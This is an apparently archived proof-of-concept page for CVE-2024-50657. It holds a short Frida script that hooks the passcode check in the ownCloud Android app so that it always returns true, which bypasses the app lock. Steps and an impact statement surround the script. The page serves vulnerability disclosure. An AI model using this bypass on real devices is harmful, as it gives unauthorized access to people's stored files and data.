Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-50657 PoC — ownCloud 安全漏洞

Source
Associated Vulnerability
Title:ownCloud 安全漏洞 (CVE-2024-50657)
Description:ownCloud是美国ownCloud公司的一套个人云存储解决方案。 ownCloud v.4.3.1版本存在安全漏洞。攻击者利用该漏洞可以提升权限。
Readme
# CVE-2024-50657:Incorrect Access Control on Owncloud apk
 An issue in Owncloud android apk allows a physically proximate attacker to escalate privileges via the PassCodeViewModel class, specifically in the checkPassCodeIsValid method.

# Exploitation
  
# Identify the Target Class and Method:

> The PassCodeViewModel class in the application manages the logic for passcode verification.
> The checkPassCodeIsValid method within this class is responsible for determining the validity of the entered passcode.

 # Hook the Method Using Frida:

> A Frida script is used to hook into the checkPassCodeIsValid method in the PassCodeViewModel class.
> The method's implementation is altered to always return true, bypassing the actual passcode validation.

# Execution:

> The Frida script is executed while the app is running.
> Any passcode input by the user will be accepted as valid, allowing unauthorized access.
# PoC

 Java.perform(function() {
 // Locate the PassCodeViewModel class in the target application
 var PassCodeActivity = Java.use('com.owncloud.android.presentation.security.passcode.PassCodeViewModel');

 // Hook the checkPassCodeIsValid method to modify its behavior
 PassCodeActivity.checkPassCodeIsValid.implementation = function(passcode) {
 
  // Bypass the actual passcode check by always returning true
     return true;
   
 };

 });

Video POC Link : https://drive.google.com/drive/folders/1C-ZYjYhmKRGvWs9YN51XOiAS2WxxwdQd?usp=sharing
# Impact:-
 This vulnerability is a client-side security bypass vulnerability. It affects users of the application who rely on the passcode feature to protect sensitive data or restrict access to certain app functionalities. By exploiting this vulnerability, an attacker can bypass the passcode check and gain unauthorized access to areas of the app that should be protected, potentially exposing user data or allowing unauthorized actions within the app.

File Snapshot

[4.0K] /data/pocs/56283ea45b5658cb654b69f0e1ca5ee32f444f30 └── [1.9K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.